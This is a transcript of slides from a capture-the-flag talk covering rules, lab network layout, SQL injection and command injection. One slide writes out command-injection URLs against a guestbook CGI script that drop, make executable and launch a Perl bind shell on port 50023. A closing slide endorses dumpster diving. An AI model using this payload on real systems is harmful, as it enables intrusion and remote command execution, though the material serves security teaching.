CTF - CIAST

Download Report

Transcript CTF - CIAST 

CTF
Mike Gerschefske
Justin Gray
What is it?
Came from Defcon
 UCSB sp0nsorz – won last years Defcon
 Test Skills of understanding security
 What it’s not!


See who’s 1337 or l4am3r through script
kiddie techniques
Rules

Don’t be Lame
This includes (D)DoS – Unfair bandwidth
practices
 Circumventing the private network and using
public ip address (not cool)
 Illegal stuff is not a good idea

 E.g.
don’t hack the power grid
Everything else is legal!

At Defcon team reverse engineered score
system and generated tokens.


People got upset, but was legal
Can root boxes but not what’s being
tested.

w00t
Last years event


Have to assume this year is similar
We p0wn3d the easy parts

SQL Injection



Example http://128.198.61.43/~estore/cgi-bin/login.php
Exploit unchecked user input
Security through obscurity

OMG – this really works!!!

Perl example
Real Network
Team Box
10.10.1.1
Hub
Test Network
Mon Box
10.10.1.x
Vuln
Attack Box
Vuln
Patch Test
10.10.1.3
Vuln
Image Test Box
Attack
Boxes
10.10.1.4
Team
Image 10.10.1.2
Console for Fixes
UCCS
Boxes
UCCS
Boxes
Network Topography
Affectively created two directional nat.
 Blocking IP addresses is futile



All traffic comes from SAME IP
Forces Packet Inspection
the example



http://128.198.61.43/~guestbook/cgibin/guestbook.pl?guestbook=`echo%20e%20"\043\041/usr/bin/perl\nuse%20IO\073\nwhile(1){\nwhile(\044c
=new%20IO::Socket::INET(LocalPort,\n50023,Reuse,1,Listen)>accept){\n\044~->fdopen(\044c,w)\073\nSTDIN>fdopen(\044c,r)\073\nsystem\044_%20while<>\073\n\175\n\175\n"
%20>%20final.pl`
http://128.198.61.43/~guestbook/cgibin/guestbook.pl?guestbook=`chmod%20755%20final.pl`
http://128.198.61.43/~guestbook/cgibin/guestbook.pl?guestbook=`final.pl`
The basstard demo



W00t http://128.198.61.43
SQL Injection
Unchecked code injection


File upload!!!
Buffer overrun


Security through obscurity revisited
http://128.198.61.43/test/ccauthd/ccauthd.c
Backups
Network Topography
So you wanna be a h4x0rz?

Here’s what you need!
vi – or any editor
 a browser – or anything to do http
 a compiler (depends on the situation)
 a debugger (optional)
 a clue!

 Dumpster
diving is cool
 Getting information from the inside